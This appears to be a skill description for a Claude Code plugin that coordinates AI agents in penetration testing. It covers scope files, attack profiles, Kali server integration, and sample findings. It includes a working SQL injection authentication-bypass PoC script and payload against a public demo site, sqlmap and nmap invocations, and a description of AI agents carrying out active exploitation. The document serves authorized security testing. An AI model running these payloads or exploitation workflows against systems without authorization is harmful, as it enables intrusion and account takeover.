AI-driven penetration testing framework for Claude Code with 15 agents, 6 skill coordinators, and 63 attack categories coordinated through structured engagement workflows
---
name: claude-pentest-framework
description: AI-driven penetration testing framework for Claude Code with 15 agents, 6 skill coordinators, and 63 attack categories coordinated through structured engagement workflows
triggers:
- run a penetration test with Claude
- set up offensive security testing with AI
- configure a pentest engagement scope
- launch automated security assessment
- connect Kali Linux server for pentesting
- coordinate AI pentest agents
- define attack profile for security testing
- execute structured vulnerability assessment
---
# claude-pentest Framework
> Skill by [ara.so](https://ara.so) — Security Skills collection.
claude-pentest is a comprehensive penetration testing framework for Claude Code that coordinates 15 specialized agents across 6 skill domains and 63 attack categories. It provides structured, human-in-the-loop, evidence-driven security assessments with automatic PoC generation, HTTP evidence capture, and Playwright screenshots.
## Core Concepts
**Agent Coordination Framework**: Unlike traditional scanners, claude-pentest orchestrates specialized executor agents following a strict 4-phase workflow (reconnaissance → planning → approval → execution → escalation).
**Human-in-the-Loop**: Every exploitation attempt requires explicit operator approval. Claude cannot proceed to active exploitation without confirmation.
**Evidence-First**: All findings include working PoCs (`poc.py`), captured output (`poc_output.txt`), HTTP evidence, and screenshots. No theoretical findings.
**Structured Outputs**: Machine-readable JSON + markdown analysis written to `outputs/{engagement}/`.
## Installation
### Add Marketplace Repository
```bash
# Inside Claude Code
/plugin marketplace add Stickman230/claude-pentest
```
### Install Plugin
```bash
# Inside Claude Code
/plugin install pentest@claude-pentest
```
The plugin installs to `.claude/` in your project directory. All agents, skills, and slash commands become available immediately.
### Optional: Kali Server (MKS)
For server-side testing (nmap, sqlmap, gobuster, Metasploit), deploy [MCP-Kali-Server](https://github.com/Wh0am123/MCP-Kali-Server) on a Kali Linux host:
```bash
# On Kali Linux
git clone https://github.com/Wh0am123/MCP-Kali-Server
cd MCP-Kali-Server
# Follow MCP-Kali-Server setup instructions
# In Claude Code
/pentest:pentest-kali
# Enter server URL: http://192.168.1.10:5000
```
## Key Commands
### Launch Full Engagement
```bash
/pentest:pentest
```
**Flow**:
1. Isolate session to pentest plugin (recommended)
2. Configure scope (target, engagement name, out-of-scope, time budget, auth, thoroughness)
3. Select attack profile (Full / Web app / API & cloud / Custom)
4. Configure Kali server integration (optional)
5. Review engagement summary
6. Execute: pre-flight → recon → planning → approval → executor deployment → time-budget loop → report
**Session Isolation**: When enabled, Claude constrains itself to pentest plugin agents only, preventing interference from other plugins.
### Define Scope
```bash
/pentest:pentest-scope
```
Configure or update engagement scope without launching. Writes `.pentest-scope.json`:
```json
{
"target": "https://demo.testfire.net",
"engagement_name": "altoro-mutual-pentest",
"out_of_scope": "*.testfire.net/admin, production databases",
"time_budget": "2 hours",
"auth": "username: jsmith, password: demo1234",
"thoroughness": "Medium",
"output_formats": ["json", "markdown", "csv"],
"status": "pending"
}
```
**Thoroughness Levels**:
- **Light**: Quick scan, common vulnerabilities only
- **Medium**: Standard pentest, broad coverage
- **Deep**: Extended testing, edge cases
- **Full**: Comprehensive, maximum time investment
### Define Attack Profile
```bash
/pentest:pentest-attacks
```
Select which attack categories to cover. Writes `.pentest-attacks.json`:
```json
{
"mode": "web_application",
"selected_categories": [
"injection",
"client_side",
"authentication",
"api_security",
"business_logic"
],
"skill_coordinators": [
"injection-coordinator",
"client-side-coordinator",
"auth-coordinator"
],
"executors": [
"sql-injection-agent",
"xss-agent",
"auth-bypass-agent"
],
"status": "pending"
}
```
**Attack Profiles**:
- **Full suite**: All 63 categories (12 domains)
- **Web application**: Injection, client-side, server-side, authentication, API, business logic
- **API & cloud**: API security, cloud containers, IP infrastructure, CVE testing, domain recon
- **Custom**: Multi-select from all categories
### Connect Kali Server
```bash
/pentest:pentest-kali
```
Configures remote Metasploit-Kali Server integration. Writes `.pentest-mks.json`:
```json
{
"server_url": "http://192.168.1.10:5000",
"status": "active",
"tools_available": {
"nmap": true,
"gobuster": true,
"dirb": true,
"nikto": true,
"sqlmap": true,
"hydra": true,
"john": true,
"metasploit": true
},
"verified_at": "2026-06-08T14:30:00Z"
}
```
**Tool Endpoints** (when MKS active):
```bash
# nmap scan via MKS
curl -X POST http://192.168.1.10:5000/nmap \
-H "Content-Type: application/json" \
-d '{"target": "192.168.1.20", "options": "-sV -sC"}'
# sqlmap via MKS
curl -X POST http://192.168.1.10:5000/sqlmap \
-H "Content-Type: application/json" \
-d '{"url": "http://target.com/api?id=1", "options": "--risk=2 --level=2"}'
```
### Exit Engagement
```bash
/pentest:pentest-exit
```
**Flow**:
1. Read findings from `outputs/{engagement}/findings/`
2. Flush unsaved notes to disk
3. Output severity-bucketed summary (Critical/High/Medium/Low/Info)
4. Reset `.pentest-scope.json` and `.pentest-attacks.json` to `status: pending`
5. Lift session isolation
6. Prompt to run `/clear`
## Session State Files
Three JSON files at project root persist configuration:
| File | Purpose | Written By |
|------|---------|-----------|
| `.pentest-scope.json` | Target, timing, thoroughness | `/pentest:pentest-scope`, `/pentest:pentest` |
| `.pentest-attacks.json` | Attack categories, skill mapping | `/pentest:pentest-attacks`, `/pentest:pentest` |
| `.pentest-mks.json` | Kali server URL, tool availability | `/pentest:pentest-kali` |
## Agent Architecture
### 15 Executor Agents
Each follows 4-phase workflow:
1. **Reconnaissance**: Passive information gathering
2. **Planning**: Attack vector identification
3. **Approval**: Human-in-the-loop confirmation
4. **Execution**: Active exploitation with PoC generation
**Specialized Agents**:
- `sql-injection-agent`: SQL injection testing (error-based, blind, time-based)
- `xss-agent`: XSS testing (reflected, stored, DOM-based)
- `xxe-agent`: XML External Entity exploitation
- `ssrf-agent`: Server-Side Request Forgery
- `auth-bypass-agent`: Authentication mechanism testing
- `api-security-agent`: REST/GraphQL endpoint testing
- `cloud-security-agent`: Cloud misconfiguration detection
- `cve-agent`: Known vulnerability exploitation
### 6 Skill Coordinators
Coordinate related executors:
- `injection-coordinator`: SQL, NoSQL, LDAP, command injection
- `client-side-coordinator`: XSS, CSRF, clickjacking, CORS
- `server-side-coordinator`: XXE, SSRF, file upload, deserialization
- `auth-coordinator`: Broken auth, session management, crypto
- `api-coordinator`: API security, GraphQL, WebSocket
- `infra-coordinator`: Network, cloud, CVE, domain recon
## Output Structure
```
outputs/
└── {engagement_name}/
├── findings/
│ ├── finding_001_sql_injection.json
│ ├── finding_001_poc.py
│ ├── finding_001_poc_output.txt
│ ├── finding_001_screenshot.png
│ └── finding_001_http_evidence.txt
├── processed/
│ ├── findings/
│ └── analysis.json
├── pentest-report.json
└── report.md
```
### Finding Schema
```json
{
"finding_id": "001",
"title": "SQL Injection in Login Form",
"severity": "Critical",
"cvss_score": 9.8,
"attack_category": "injection",
"agent": "sql-injection-agent",
"target_url": "https://demo.testfire.net/login.jsp",
"vulnerable_parameter": "uid",
"attack_vector": "' OR '1'='1' --",
"impact": "Full database access, authentication bypass",
"poc_file": "finding_001_poc.py",
"poc_output_file": "finding_001_poc_output.txt",
"screenshot_file": "finding_001_screenshot.png",
"http_evidence_file": "finding_001_http_evidence.txt",
"remediation": "Use parameterized queries, input validation",
"references": ["CWE-89", "OWASP A03:2021"],
"verified_at": "2026-06-08T14:45:00Z"
}
```
## Common Patterns
### Quick Web App Pentest
```bash
# Define scope
/pentest:pentest-scope
# Enter:
# - Target: https://demo.testfire.net
# - Engagement name: altoro-quick
# - Out-of-scope: None
# - Time budget: 1 hour
# - Auth: None
# - Thoroughness: Medium
# - Formats: json, markdown
# Use web app profile (skip attack selection)
/pentest:pentest
# Select: Use Web Application profile when prompted
```
### API Pentest with Kali Server
```bash
# Connect Kali first
/pentest:pentest-kali
# Enter: http://192.168.1.10:5000
# Define scope
/pentest:pentest-scope
# Target: https://api.example.com/v1
# Thoroughness: Deep
# Select API profile
/pentest:pentest-attacks
# Mode: API & cloud profile
# Launch
/pentest:pentest
```
### Custom Attack Surface
```bash
# Define specific categories
/pentest:pentest-attacks
# Mode: Custom
# Select: SQL injection, SSRF, XXE, authentication bypass
/pentest:pentest
```
### Reuse Saved Configuration
```bash
# Scope and attacks already defined in previous session
/pentest:pentest
# Responds: "Found existing scope (.pentest-scope.json)"
# Select: Reuse existing scope
# Responds: "Found existing attack profile (.pentest-attacks.json)"
# Select: Use saved profile
```
## Time Budget and Escalation
The engagement operates within a **time budget** (quota) defined in scope. The orchestrator:
1. Allocates budget across recon, executor deployment, and escalation phases
2. Runs **time-budget loop** for escalation after initial findings
3. Deploys Metasploit via MKS for post-exploitation **only if** CVE/RCE confirmed
4. Never runs speculative exploitation
**Example Time Budget Allocation** (2 hour total):
- Pre-flight: 5 minutes
- Recon: 20 minutes
- Planning: 10 minutes
- Executor deployment: 60 minutes (parallel)
- Time-budget loop (escalation): 20 minutes
- Report generation: 5 minutes
## Configuration Examples
### Authenticated Testing
```json
{
"target": "https://app.example.com",
"auth": "Bearer token: $AUTH_TOKEN (stored in env), cookie: session_id=$SESSION_ID",
"thoroughness": "Deep"
}
```
Reference environment variables instead of hardcoding:
```python
# In PoC scripts
import os
AUTH_TOKEN = os.environ.get("AUTH_TOKEN")
SESSION_ID = os.environ.get("SESSION_ID")
headers = {
"Authorization": f"Bearer {AUTH_TOKEN}",
"Cookie": f"session_id={SESSION_ID}"
}
```
### Multi-Target Scope
```json
{
"target": "https://app.example.com, https://api.example.com, 192.168.1.0/24",
"out_of_scope": "192.168.1.1 (gateway), *.example.com/admin",
"time_budget": "4 hours"
}
```
### API-Specific Configuration
```json
{
"target": "https://api.example.com/v1",
"auth": "API key: $API_KEY (header: X-API-Key)",
"selected_categories": [
"api_security",
"injection",
"authentication",
"business_logic"
]
}
```
## Evidence Files
### PoC Script Example
`finding_001_poc.py`:
```python
#!/usr/bin/env python3
import requests
import os
TARGET_URL = "https://demo.testfire.net/login.jsp"
PAYLOAD = "' OR '1'='1' --"
def exploit():
data = {
"uid": PAYLOAD,
"passw": "anything"
}
response = requests.post(TARGET_URL, data=data)
if "Welcome" in response.text and response.status_code == 200:
print("[+] SQL Injection successful")
print(f"[+] Authentication bypassed with payload: {PAYLOAD}")
return True
else:
print("[-] Exploitation failed")
return False
if __name__ == "__main__":
exploit()
```
### HTTP Evidence Format
`finding_001_http_evidence.txt`:
```
=== REQUEST ===
POST /login.jsp HTTP/1.1
Host: demo.testfire.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
uid=' OR '1'='1' --&passw=anything
=== RESPONSE ===
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: AltoroAccounts=...
<!DOCTYPE html>
<html>
<body>
<h1>Welcome, Admin</h1>
...
```
## Troubleshooting
### Engagement Won't Start
**Symptom**: `/pentest:pentest` fails at pre-flight check.
**Solution**: Verify target is reachable:
```bash
curl -I https://target.example.com
```
Check `.pentest-scope.json` for valid target format.
### Kali Server Connection Failed
**Symptom**: MKS tools unavailable, falling back to local bash.
**Solution**: Test MKS connectivity:
```bash
curl http://192.168.1.10:5000/health
```
Verify firewall rules allow connection. Re-run `/pentest:pentest-kali`.
### Missing Findings
**Symptom**: Engagement completes but `outputs/{name}/findings/` is empty.
**Solution**: Check thoroughness level (Light may produce fewer findings). Review time budget allocation. Examine `outputs/{name}/processed/analysis.json` for agent logs.
### PoC Scripts Fail
**Symptom**: `poc.py` returns errors when executed manually.
**Solution**: Install dependencies:
```bash
pip install requests playwright
python -m playwright install
```
Verify environment variables are set:
```bash
export AUTH_TOKEN="your_token"
export SESSION_ID="your_session"
```
### Agent Timeout
**Symptom**: Executor agents timeout during deployment.
**Solution**: Increase time budget in scope. Reduce thoroughness level. Disable MKS if network latency is high.
### Session Isolation Not Lifted
**Symptom**: After `/pentest:pentest-exit`, other plugins still unavailable.
**Solution**: Run `/clear` to fully reset context:
```bash
/clear
```
## Attack Coverage
**12 Attack Domains**:
1. **Injection**: SQL, NoSQL, LDAP, OS command, SSTI, log injection
2. **Client-Side**: XSS, CSRF, clickjacking, CORS, DOM clobbering
3. **Server-Side**: XXE, SSRF, file upload, deserialization, path traversal
4. **Authentication**: Broken auth, session management, weak crypto
5. **API Security**: REST, GraphQL, WebSocket, API key exposure
6. **Business Logic**: Workflow bypass, race conditions, price manipulation
7. **Access Control**: IDOR, privilege escalation, missing function-level access control
8. **Configuration**: Security misconfiguration, default credentials, verbose errors
9. **Cloud & Containers**: S3 buckets, Docker, Kubernetes, cloud metadata
10. **IP Infrastructure**: Network scanning, service enumeration, SSL/TLS
11. **CVE Testing**: Known vulnerabilities, version detection, patch validation
12. **Domain Recon**: DNS enumeration, subdomain discovery, certificate transparency
**63 Sub-Categories** mapped to specific executor agents and skill coordinators.
## Legal and Ethical Use
**ALWAYS obtain written permission before testing any system you do not own.**
claude-pentest is designed for:
- Authorized penetration testing engagements
- Bug bounty programs (within scope)
- Security research in controlled environments
- Red team exercises with proper authorization
**Unauthorized use is illegal and unethical.**
## Integration with Claude Code
The framework is designed to work within Claude Code's agent harness:
- **One level of subagent nesting**: `/pentest:pentest` orchestrates from main session
- **Slash command discovery**: Commands auto-register with Claude Code
- **Session isolation**: Prevents plugin interference during active engagements
- **Context window management**: `/clear` recommended between engagements
When active, claude-pentest coordinates all testing activities through structured workflows, ensuring evidence capture, human approval gates, and organized output for every finding.
Creator's repository · aradotso/security-skills